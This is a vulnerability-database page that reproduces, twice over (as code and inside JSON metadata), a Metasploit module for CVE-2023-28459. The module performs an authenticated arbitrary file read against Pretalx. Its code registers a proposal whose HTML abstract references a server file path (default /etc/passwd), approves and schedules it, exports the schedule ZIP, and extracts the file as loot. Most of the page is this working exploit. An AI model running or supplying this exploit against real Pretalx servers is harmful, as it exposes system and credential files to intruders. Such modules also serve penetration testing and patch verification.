Pretalx Arbitrary File Read/Limited File Write_MSF:AUXILIARY-SCANNER-HTTP-PRETALX_FILE_READ_CVE_2023_28459-

6.5 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Description

This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-SCANNER-HTTP-PRETALX_FILE_READ_CVE_2023_28459-

Published Aug 28, 2025 at 18:53

Modified Aug 29, 2025 at 18:53

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zip'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::HTTP::Pretalx
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Pretalx Arbitrary File Read/Limited File Write',
'Description' => 'This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx will iteratively include any file referenced by any HTML tag and does not properly check the path of the file, which can lead to arbitrary file read. The module requires credentials that allow schedule export, schedule release and approval of proposals. Additionally, module requires conference name and URL for media files.',
'Author' => [
'Stefan Schiller', # security researcher
'msutovsky-r7' # module dev
],
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptString.new('MEDIA_URL', [true, 'Prepend path to file path that allows arbitrary read', '/media']),
OptString.new('EMAIL', [true, 'User email to Pretalx backend']),
OptString.new('PASSWORD', [true, 'Password to Pretalx backend'])
])
register_advanced_options([
OptInt.new('ExportTimeout', [true, 'Set wait time for schedule export', 5])
])
end

def check_host(_ip)
return Exploit::CheckCode::Unknown('Login failed, please check credentials') unless login(datastore['EMAIL'], datastore['PASSWORD'])

version = get_version

return Exploit::CheckCode::Detected unless version

return Exploit::CheckCode::Appears("Detected vulnerable version #{version}") if version <= Rex::Version.new('2.3.1')

return Exploit::CheckCode::Safe("Detected version #{version} is not vulnerable")
rescue UnexpectedResponseError
return Exploit::CheckCode::Unknown('Received unexpected response, check your options')
rescue VersionCheckError
return Exploit::CheckCode::Detected('Pretalx detected, failed to verify version')
rescue CsrfError
return Exploit::CheckCode::Unknown('Failed to get CSRF token')
rescue SessionCookieError
return Exploit::CheckCode::Detected('Pretalx detected, failed to get session cookie - check your credentials')
end

def run_host(ip)
vprint_status('Register malicious proposal')

proposal_info = {
abstract: %<(<img src="#{datastore['MEDIA_URL']}//#{datastore['FILEPATH']}"/>>,
email: datastore['EMAIL'],
password: datastore['PASSWORD']
}

registration_info = register_proposal(proposal_info)
proposal_name = registration_info[:proposal_name]
vprint_status("Submit proposal #{proposal_name}")

vprint_status("Logging with credentials: #{datastore['EMAIL']}/#{datastore['PASSWORD']}")
fail_with(Failure::NoAccess, 'Incorrect credentials') unless login(datastore['EMAIL'], datastore['PASSWORD'])

vprint_status('Approving proposal')
approve_proposal(proposal_name)

vprint_status("Adding #{proposal_name} to schedule")
fail_with(Failure::Unknown, 'Failed to add submission to schedule') unless add_proposal_to_schedule(proposal_name)
vprint_status('Releasing schedule')
release_schedule

vprint_status('Exporting schedule')
export_zip

vprint_status('Wait for schedule ZIP to be exported')

sleep(datastore['ExportTimeout'])

vprint_status('Trying to extract target file')

zip_data = download_zip

zip = Zip::File.open_buffer(zip_data)
target_entry = zip.find_entry("#{datastore['CONFERENCE_NAME']}#{datastore['MEDIA_URL']}#{datastore['FILEPATH']}")
fail_with Failure::PayloadFailed, 'Failed to extract target file, check if export worked' unless target_entry
extracted_content = zip.read(zip.find_entry(target_entry))

vprint_status('Extraction successful')

loot_path = store_loot(
"pretalx.#{datastore['FILEPATH']}",
'text/plain',
ip,
extracted_content,
"pretalx-#{datastore['FILEPATH']}.txt",
'Pretalx'
)
print_status("Stored results in #{loot_path}")

report_vuln({
host: rhost,
port: rport,
name: name,
refs: references,
info: "Module #{fullname} successfully leaked file"
})
end

end

{
    "lastseen": "2025-08-29T19:54:51",
    "description": "This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx...",
    "published": "2025-08-28T18:53:45",
    "modified": "2025-08-29T18:53:27",
    "type": "metasploit",
    "title": "Pretalx Arbitrary File Read/Limited File Write",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-SCANNER-HTTP-PRETALX_FILE_READ_CVE_2023_28459-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2023-28459"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zip'\n\nclass MetasploitModule < Msf::Auxiliary\n\n  include Msf::Exploit::Remote::HTTP::Pretalx\n  include Msf::Auxiliary::Report\n  include Msf::Auxiliary::Scanner\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Pretalx Arbitrary File Read/Limited File Write',\n        'Description' => 'This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx will iteratively include any file referenced by any HTML tag and does not properly check the path of the file, which can lead to arbitrary file read. The module requires credentials that allow schedule export, schedule release and approval of proposals. Additionally, module requires conference name and URL for media files.',\n        'Author' => [\n          'Stefan Schiller', # security researcher\n          'msutovsky-r7' # module dev\n        ],\n        'License' => MSF_LICENSE,\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n        }\n      )\n    )\n    register_options([\n      OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),\n      OptString.new('MEDIA_URL', [true, 'Prepend path to file path that allows arbitrary read', '/media']),\n      OptString.new('EMAIL', [true, 'User email to Pretalx backend']),\n      OptString.new('PASSWORD', [true, 'Password to Pretalx backend'])\n    ])\n    register_advanced_options([\n      OptInt.new('ExportTimeout', [true, 'Set wait time for schedule export', 5])\n    ])\n  end\n\n  def check_host(_ip)\n    return Exploit::CheckCode::Unknown('Login failed, please check credentials') unless login(datastore['EMAIL'], datastore['PASSWORD'])\n\n    version = get_version\n\n    return Exploit::CheckCode::Detected unless version\n\n    return Exploit::CheckCode::Appears(\"Detected vulnerable version #{version}\") if version <= Rex::Version.new('2.3.1')\n\n    return Exploit::CheckCode::Safe(\"Detected version #{version} is not vulnerable\")\n  rescue UnexpectedResponseError\n    return Exploit::CheckCode::Unknown('Received unexpected response, check your options')\n  rescue VersionCheckError\n    return Exploit::CheckCode::Detected('Pretalx detected, failed to verify version')\n  rescue CsrfError\n    return Exploit::CheckCode::Unknown('Failed to get CSRF token')\n  rescue SessionCookieError\n    return Exploit::CheckCode::Detected('Pretalx detected, failed to get session cookie - check your credentials')\n  end\n\n  def run_host(ip)\n    vprint_status('Register malicious proposal')\n\n    proposal_info = {\n      abstract: %<(<img src=\"#{datastore['MEDIA_URL']}//#{datastore['FILEPATH']}\"/>>,\n      email: datastore['EMAIL'],\n      password: datastore['PASSWORD']\n    }\n\n    registration_info = register_proposal(proposal_info)\n    proposal_name = registration_info[:proposal_name]\n    vprint_status(\"Submit proposal #{proposal_name}\")\n\n    vprint_status(\"Logging with credentials: #{datastore['EMAIL']}/#{datastore['PASSWORD']}\")\n    fail_with(Failure::NoAccess, 'Incorrect credentials') unless login(datastore['EMAIL'], datastore['PASSWORD'])\n\n    vprint_status('Approving proposal')\n    approve_proposal(proposal_name)\n\n    vprint_status(\"Adding #{proposal_name} to schedule\")\n    fail_with(Failure::Unknown, 'Failed to add submission to schedule') unless add_proposal_to_schedule(proposal_name)\n    vprint_status('Releasing schedule')\n    release_schedule\n\n    vprint_status('Exporting schedule')\n    export_zip\n\n    vprint_status('Wait for schedule ZIP to be exported')\n\n    sleep(datastore['ExportTimeout'])\n\n    vprint_status('Trying to extract target file')\n\n    zip_data = download_zip\n\n    zip = Zip::File.open_buffer(zip_data)\n    target_entry = zip.find_entry(\"#{datastore['CONFERENCE_NAME']}#{datastore['MEDIA_URL']}#{datastore['FILEPATH']}\")\n    fail_with Failure::PayloadFailed, 'Failed to extract target file, check if export worked' unless target_entry\n    extracted_content = zip.read(zip.find_entry(target_entry))\n\n    vprint_status('Extraction successful')\n\n    loot_path = store_loot(\n      \"pretalx.#{datastore['FILEPATH']}\",\n      'text/plain',\n      ip,\n      extracted_content,\n      \"pretalx-#{datastore['FILEPATH']}.txt\",\n      'Pretalx'\n    )\n    print_status(\"Stored results in #{loot_path}\")\n\n    report_vuln({\n      host: rhost,\n      port: rport,\n      name: name,\n      refs: references,\n      info: \"Module #{fullname} successfully leaked file\"\n    })\n  end\n\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/pretalx_file_read_cve_2023_28459.rb",
    "cvss": {
        "score": 6.5,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/pretalx_file_read_cve_2023_28459/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply